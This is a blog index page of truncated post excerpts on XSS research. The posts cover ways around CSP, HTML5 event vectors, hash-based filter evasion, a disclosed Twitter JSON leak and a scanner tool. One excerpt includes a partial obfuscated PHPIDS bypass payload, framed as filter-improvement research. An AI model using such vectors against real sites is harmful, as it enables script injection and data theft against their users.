I had fun at Confidence 2.0 CON, I’m gonna blog about the stuff I was holding back now So I figured how to bypass CSP with UTF-7 and JSON. Basically any site with a JSON feed that can be manipulated by an attacker (reflective or persistent) can be injected with even in a correctly escaped [...]

This is my cup of tea, a whole new way to prevent XSS and related attacks. I’ve been looking at the specification and I like the core of the policy preventing external scripts, eval etc. But reading it I started to think of ways around it because it’s fun Meta tag The meta tag seems [...]

No new PHPIDS vectors for a while? So I thought I’d write a new one as I had 5 minutes spare while drinking my coffee. I used a new technique (as far as I’m aware) to make things easier A very old feature in IE is to allow events to be declared as vbscript using [...]

It turns out I was right. Originally I thought the protocols reported by my javascript fuzzer were false positives but as like lots of my code it seems to know better than me I tested the context of the vectors in a normal HTML link which didn’t work correctly. But I was messing with some [...]

I like this event, it’s pretty cool. The reason why it’s interesting from a XSS perspective is that it is executed automatically without user interaction. This is rare in the XSS playground, usually you have to use onerror, onload or onfocus events and they only work in certain circumstances. I’d better mention that the event [...]

I’ve developed a new XSS scanner tool that’s written in Javascript called XSS Rays for Microsoft. They have given me permission to release the tool as open source which is awesome because it can be used for other open source applications. I recommend you use it as part of the web development process to make [...]

I did a couple of vectors for PHPIDS recently and I was experimenting with Firefox 3.1 beta and the new HTML5 tags. I found the audio and video tags could be used for XSS, I’m sure there are others too. The vectors are quite cool because they’re executed automatically within a onload onerror event. (Originally [...]

I did report this to Twitter a few weeks ago, but now that Chris Heilmann has let the cat out of the bag I’ll post my repro now. Basically Twitter JSON security is leaking data, the JSON feeds that are publically available shouldn’t be IMO or at least protected using known methods. So if you [...]

I haven’t hacked the PHPIDS for a while but David Lindsay (AKA Thornmaker) inspired me. When I say hacked I mean in a good way because finding bypasses helps improve the filters Here is my vector:- /Please submit the string\ to help us make the \ PHPIDS better./,y=(‘aler\ t’),x=this,x=x[y] x(‘I cant let you have all [...]

The basic attack Using the hash portion of the location is a good way to beat filters, anything sent via the hash is not sent to the server in question. We can use a large amount of data which is hidden from the server side filters and combine it with data sent on the server. [...]